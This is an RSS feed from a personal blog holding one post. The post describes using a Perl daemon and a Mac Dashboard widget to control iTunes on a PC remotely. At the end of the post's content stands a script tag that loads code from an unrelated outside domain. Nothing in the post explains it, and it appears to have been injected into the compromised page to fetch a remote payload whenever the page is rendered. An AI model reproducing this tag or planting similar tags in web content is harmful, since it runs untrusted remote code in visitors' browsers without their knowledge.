<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>/dev/null &#187; Dashboard</title>
	<atom:link href="http://blog.alien109.com/tag/dashboard/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.alien109.com</link>
	<description>development, design, and random goodness</description>
	<lastBuildDate>Thu, 10 Jun 2010 18:55:41 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Controlling iTunes remotely</title>
		<link>http://blog.alien109.com/2009/06/16/controlling-itunes-remotely/</link>
		<comments>http://blog.alien109.com/2009/06/16/controlling-itunes-remotely/#comments</comments>
		<pubDate>Tue, 16 Jun 2009 15:10:33 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Art/Design]]></category>
		<category><![CDATA[Computers]]></category>
		<category><![CDATA[Development]]></category>
		<category><![CDATA[High Tech]]></category>
		<category><![CDATA[Random Junk]]></category>
		<category><![CDATA[User Experience]]></category>
		<category><![CDATA[Dashboard]]></category>
		<category><![CDATA[Dashcode]]></category>
		<category><![CDATA[iTunes]]></category>
		<category><![CDATA[Perl]]></category>
		<category><![CDATA[Remote]]></category>

		<guid isPermaLink="false">http://blog.alien109.com/?p=241</guid>
		<description><![CDATA[So I just got this shiny new MacBook Pro. Absolutely love the thing. I&#8217;ve been away from the Macintosh platform for far too long&#8230;
Anyway &#8211; I&#8217;m sitting in my office listening to music and realized that the speakers, while okay for what they are, suck by most standards. So I pop over to my PC [...]]]></description>
			<content:encoded><![CDATA[<p>So I just got this shiny new MacBook Pro. Absolutely love the thing. I&#8217;ve been away from the Macintosh platform for far too long&#8230;</p>
<p>Anyway &#8211; I&#8217;m sitting in my office listening to music and realized that the speakers, while okay for what they are, suck by most standards. So I pop over to my PC and fire up iTunes, hit play, and use my sound system that&#8217;s hooked up to it. Sounds great. But, I&#8217;m lazy and I got tired of switching over to it change tracks, stop, pause, etc. I figured there had to be a way to control iTunes remotely from the Mac. Doing a bit of research, I found some stuff for the Mac and a PHP script that did me no good.</p>
<p>Finally I came across a Perl script (can&#8217;t remember where&#8230;) that simply runs a Daemon. Everything that I needed was already there! All I needed to do, was point a browser at the box and it had a nice simple stripped down interface for play, pause, stop, next, etc&#8230;</p>
<p>After some time, I realized I hated having to keep the browser window open. Enter MacOS dashboard widgets.</p>
<p>After some quick fiddling with Dashcode, I came up with this little dashboard widget to send the requests to the PC. The current track name only updates after a command is sent, so it isn&#8217;t updated dynamically.</p>
<p><img src="http://blog.alien109.com/wp-content/uploads/2009/06/dash-widget2.png" alt="dash-widget2" title="dash-widget2" width="509" height="154" class="alignnone size-full wp-image-246" /></p>
<p>Now my iTunes controls are at my fingertips, and I don&#8217;t have to spend the time moving my hands the whole 24 some inches to the right to do it on the PC.<br />
<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.alien109.com/2009/06/16/controlling-itunes-remotely/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
